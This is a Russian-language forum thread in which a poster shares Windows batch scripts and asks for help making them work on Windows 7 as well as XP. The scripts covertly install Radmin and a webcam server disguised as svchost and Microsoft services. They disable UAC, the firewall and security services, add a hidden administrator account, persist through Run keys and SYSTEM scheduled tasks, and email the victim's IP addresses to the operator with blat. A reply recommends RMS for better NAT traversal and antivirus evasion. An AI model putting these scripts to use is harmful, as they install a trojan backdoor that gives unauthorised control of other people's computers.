В общем есть 2 батника. Нужно сделать так, что бы они оба работали и под Win7 и под Win xp. На данный момент батники работают под WinXP. Под Семерку вылетают ошибки. 1).bat Code: cmdow @ /HID %SYSTEMROOT%/system32/rm/blat.exe -install -server smtp.почтовый_сервер.ru -port 587 -f логин@почтовый_сервер.ru -u тут_логин -pw тут_пароль ipconfig /all > %systemroot%/system32/rm/ip.txt blat.exe %systemroot%/system32/rm/ip.txt -to логин@почтовый_сервер.ru 2).bat Code: cmdow @ /HID md "%SYSTEMROOT%/system32/rm" copy /y "blat.exe" "%SYSTEMROOT%/system32/rm/blat.exe" copy /y "blat.lib" "%SYSTEMROOT%/system32/rm/blat.lib" copy /y "blat.dll" "%SYSTEMROOT%/system32/rm/blat.dll copy /y "ip.bat" "%SYSTEMROOT%/system32/rm/ip.bat" copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /silence /pass:ваш_пароль /port:ваш_порт(по умолчанию 4389) /save "%SYSTEMROOT%/svchost.exe" /start %SYSTEMROOT%/system32/rm/blat.exe -install -server smtp.почтовый_сервер.ru -port 587 -f мыло@почтовый_сервер.ru -u ваш_логин -pw ваш_пароль ipconfig /all > %systemroot%/system32/rm/ip.txt blat.exe %systemroot%/system32/rm/ip.txt -to мыло@почтовый_сервер.ru. schtasks /create /tn "security" /sc minute /mo 60 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32/rm\ip.bat del cmdow.exe del blat.exe del blat.lib del blat.dll del raddrv.dll del admdll.dll del svchost.exe del ip.bat del install.bat Это скрытая установка Radmin'a + blat'ом отправка IP На мыло. Кому не трудно, можете помочь с этим вопросом. Есть еще версия этого аля "троя." Но там все делается исключительно через анальное отверстие и палится всем. Но зато в ней bat и под WinXP и под Win7. Если нужно выкладываю код. 1) .bat Code: @echo off ipconfig /all > localip.txt realip.exe > realip.txt ping -n 2 127.0.0.1 > nul blat.exe -install -server smtp.yandex.ru -port 25 -f логин@yandex.ru -u логин -pw пароль blat.exe -to логин@yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP" blat.exe -to логин@yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP" del /f /q localip.txt del /f /q realip.txt 2) .bat Code: @echo off if exist c:\users\nul (goto win7) else goto winxp :win7 ping -n 5 127.0.0.1 start %temp%\poc.exe ping -n 5 127.0.0.1 goto install :winxp net stop Alerter sc config Alerter start= disabled net stop wscsvc sc config wscsvc start= disabled net stop SharedAccess sc config SharedAccess start= disabled sc config TlntSvr start= auto net start TlntSvr :install copy /y "%temp%\ip.exe" "%SYSTEMROOT%/ip.exe" copy /y "%temp%\cam_server.exe" "%SystemRoot%\cam_server.exe" reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f attrib +s +h +r "%SYSTEMROOT%/ip.exe" attrib +s +h +r "%SYSTEMROOT%/cam_server.exe" netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow netsh firewall add allowedprogram "%SYSTEMROOT%\cam_server.exe" "cam_server" ENABLE netsh firewall add portopening tcp 57011 all net user HelpAssistant admin /add net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes net user HelpAssistant admin %temp%\msupdate.msi /qn /norestart start %temp%\ip.exe ping -n 5 127.0.0.1 attrib +S +H %windir%\system32\rserver30 schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f cd %SystemRoot%\ start cam_server.exe pass=Пароль port=57011 net stop rserver3 reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f net start rserver3 Заранее спасибо)
ЗАБУДЬ про радмин! 1)не обходит NAT 2)не актуален по сроку выдержки (Палится АВ при скрытом инсталле) 3)r_server слишком уже знакомо для любого и убивается служба , что очень печально \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ бери лучше RMS! 1)обходит NAT 2)много функций чем радмина 3)на почту само высылает ID and pass ты еще думаешь? хахахха
